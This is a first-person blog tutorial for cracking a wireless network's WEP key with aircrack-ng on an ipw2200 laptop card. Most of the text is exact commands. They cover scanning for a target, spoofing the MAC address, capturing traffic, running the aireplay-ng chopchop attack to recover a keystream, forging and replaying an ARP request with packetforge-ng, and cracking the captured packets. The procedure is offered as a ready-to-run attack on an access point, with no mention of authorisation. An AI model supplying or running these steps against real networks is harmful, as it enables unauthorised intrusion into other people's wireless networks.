I know there are already about a thousand tutorials but I couldn’t find anything complete or up-to-date (or english). Also, please bear in mind that this is my first tutorial.
Before we begin the attack, we need to update and get some information. First update aircrack-ng to the latest version (0.9.1 for me).
I saved to a USB flash:
mount /dev/sda1 /mnt/sda_removable
cp /mnt/sda_removable/aircrack-ng-0.9.1.tar.gz ~
Or configure a network adaptor and d/l it (change X’s):
tar zxvf aircrack-ng-0.9.1.tar.gz
We will also need to know the target’s name (ESSID), MAC address, and the channel. Please note that my wireless device is “eth1” but yours may be different; use “iwconfig” to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)
iwlist eth1 scan
Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.
modprobe ipw2200 rtap_iface=1
Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55
Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed
Now start collecting traffic on rtap0. “dump” is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0
Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier “-i rtap0.” This tells aireplay to use rtap0 for listening and eth1 for injecting. Also “-4” is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1
A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like “replay_dec-######.xor”
Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn’t start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn’t match. I just re-ran aireplay and it was fine.
Now we will create an arp-request packet using the aquired keysteam file. The “-l” and “-k” options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request
Finally we will send our newly created arp-request packet over and over. After this step you should see the “Data” begin to rise quickly back in the first terminal (airodump). If the data doesn’t change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1
Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap
I hope this tutorial has proven helpful.
Test on my Dell inspiron 6000 (centrino) ram 1.2GB .
Filed under: hacking |